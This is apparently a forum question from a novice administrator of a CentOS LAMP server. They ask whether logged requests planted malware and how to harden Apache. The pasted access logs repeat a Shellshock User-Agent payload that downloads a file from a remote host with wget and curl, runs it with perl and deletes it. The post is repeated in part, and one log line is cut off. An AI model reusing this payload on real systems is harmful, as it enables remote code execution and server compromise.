This is a bit confusing, by the way I'm not a sysAd and only know a little bit about handling a linux. I'm running a website (LAMP) and hosting it in Digital Ocean. The server is centos 7 and installed a few security like fail2ban. I frequently check the error logs and request logs, just today I saw a few disturbing request here it is:

Error Logs

[Tue Aug 25 09:48:39.688528 2015] [core:error] [pid 24312] [client 64.15.155.177:33663] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1

[Tue Aug 25 09:48:40.877570 2015] [cgi:error] [pid 24306] [client 64.15.155.177:35398] script not found or unable to stat: /var/www/cgi-bin/report.cgi

[Tue Aug 25 09:48:41.042423 2015] [cgi:error] [pid 24331] [client 64.15.155.177:35687] script not found or unable to stat: /var/www/cgi-bin/webmap.cgi

[Tue Aug 25 09:48:41.206167 2015] [cgi:error] [pid 24351] [client 64.15.155.177:35888] script not found or unable to stat: /var/www/cgi-bin/whois.cgi

[Tue Aug 25 09:48:42.543500 2015] [cgi:error] [pid 24186] [client 64.15.155.177:36531] script not found or unable to stat: /var/www/cgi-bin/register.cgi

[Tue Aug 25 09:48:42.880804 2015] [cgi:error] [pid 24306] [client 64.15.155.177:38036] script not found or unable to stat: /var/www/cgi-bin/download.cgi

[Tue Aug 25 09:48:43.047761 2015] [cgi:error] [pid 24331] [client 64.15.155.177:38502] script not found or unable to stat: /var/www/cgi-bin/shop.cgi

[Tue Aug 25 09:48:43.503216 2015] [cgi:error] [pid 24353] [client 64.15.155.177:39001] script not found or unable to stat: /var/www/cgi-bin/profile.cgi

[Tue Aug 25 09:48:43.671687 2015] [cgi:error] [pid 24358] [client 64.15.155.177:39387] script not found or unable to stat: /var/www/cgi-bin/about_us.cgi

[Tue Aug 25 09:48:43.835678 2015] [cgi:error] [pid 24359] [client 64.15.155.177:39632] script not found or unable to stat: /var/www/cgi-bin/php.fcgi

[Tue Aug 25 09:48:44.002389 2015] [cgi:error] [pid 24361] [client 64.15.155.177:39862] script not found or unable to stat: /var/www/cgi-bin/calendar.cgi

[Tue Aug 25 09:48:44.774084 2015] [cgi:error] [pid 24362] [client 64.15.155.177:40930] script not found or unable to stat: /var/www/cgi-bin/download.cgi

[Tue Aug 25 09:48:44.942337 2015] [cgi:error] [pid 24363] [client 64.15.155.177:41177] script not found or unable to stat: /var/www/cgi-bin/light_board.cgi

[Tue Aug 25 09:48:45.108830 2015] [cgi:error] [pid 24365] [client 64.15.155.177:41430] script not found or unable to stat: /var/www/cgi-bin/main.cgi

[Tue Aug 25 09:48:45.291641 2015] [cgi:error] [pid 24283] [client 64.15.155.177:41677] script not found or unable to stat: /var/www/cgi-bin/search.cgi

Request Logs

64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 301 234 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /main.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /info.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /index.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /admin.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
121.54.44.93 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-ph; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/register.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:43 -0400] "GET /cgi-bin/shop.cgi HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:43 -0400] "GET /cgi-sys/signup.cgi HTTP/1.1" 301 252 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:43 -0400] "GET /cgi-bin/profile.cgi HTTP/1.1" 404 217 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:43 -0400] "GET /cgi-bin/about_us.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:43 -0400] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:44 -0400] "GET /cgi-bin/calendar.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:44 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:44 -0400] "GET /cgi-bin/light_board.cgi HTTP/1.1" 404 221 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/main.cgi HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/search.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/test.cgi HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/file_up.cgi HTTP/1.1" 404 217 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/concept.cgi HTTP/1.1" 404 217 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/query.cgi HTTP/1.1" 404 215 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/counter.cgi HTTP/1.1" 404 217 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/kontakt.cgi HTTP/1.1" 404 217 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/backup.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/firewall.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/index.cgi HTTP/1.1" 404 215 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/index2.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:47 -0400] "GET /cgi-bin/reboot.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:47 -0400] "GET /cgi-bin/printenv HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:47 -0400] "GET /cgi-bin/test-cgi HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png 
64.15.155.177 - - [25/Aug/2015:09:48:47 -0400] "GET /cgi-bin/Count.cgi HTTP/1.1" 404 215 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:47 -0400] "GET /cgi-bin/supply.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:48 -0400] "GET /cgi-bin/test.sh HTTP/1.1" 404 213 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:48 -0400] "GET /cgi-bin/upload.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:50 -0400] "GET /cgi-sys/php5 HTTP/1.1" 301 246 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:51 -0400] "GET /phppath/cgi_wrapper HTTP/1.1" 301 253 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:51 -0400] "GET /phppath/php HTTP/1.1" 301 245 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"

My question is, does the hacker is trying to plant the virus file name "a2.png" to my /tmp folder? and does the hacker success planting it?

How should I know if the virus is now running in my server?

So far I can't see that the file name exist in my tmp folder. What security measurement or server hardening should I install? And proper configuration of the apache? I only used the standard config of apache when I install the LAMP.

The website I'm handling is on virtual host and I'm using a framework to make it more secure. I'm not just sure If i'm on the right track securing my web server, I only installed fail2ban for the logged-in attempt.

This is a bit confusing, by the way I’m not a system administrator and only know a little bit about handling a Linux.

I’m running a LAMP-based website and hosting it on Digital Ocean. The server is CentOS 7 and I installed a few security tools like like Fail2ban. I frequently check the error logs and request logs, just today I saw a few disturbing requests; examples below.

My question is, does the hacker is trying to plant the virus file name "a2.png" to my /tmp folder? and does the hacker success planting it?

How should I know if the virus is now running in my server?

So far I can’t see that the file name exist in my tmp folder. What security measurement or server hardening should I install? And proper configuration of the apache? I only used the standard config of apache when I install the LAMP.

The website I’m handling is on virtual host and I’m using a framework to make it more secure. I’m not just sure If I’m on the right track securing my web server, I only installed Fail2ban for the logged-in attempt.

Error Log Examples

[Tue Aug 25 09:48:39.688528 2015] [core:error] [pid 24312] [client 64.15.155.177:33663] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1

[Tue Aug 25 09:48:40.877570 2015] [cgi:error] [pid 24306] [client 64.15.155.177:35398] script not found or unable to stat: /var/www/cgi-bin/report.cgi

[Tue Aug 25 09:48:41.042423 2015] [cgi:error] [pid 24331] [client 64.15.155.177:35687] script not found or unable to stat: /var/www/cgi-bin/webmap.cgi

Request Log Examples

64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 301 234 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /main.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /info.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /index.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /admin.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
121.54.44.93 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-ph; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/register.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"

I'm not allowed to post more than 2 links so please view the request logs here at pastebin: http://pastebin.com/5kWB6X05

64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 301 234 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /main.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /info.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /index.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /admin.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
121.54.44.93 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-ph; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/register.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:43 -0400] "GET /cgi-bin/shop.cgi HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:43 -0400] "GET /cgi-sys/signup.cgi HTTP/1.1" 301 252 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:43 -0400] "GET /cgi-bin/profile.cgi HTTP/1.1" 404 217 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:43 -0400] "GET /cgi-bin/about_us.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
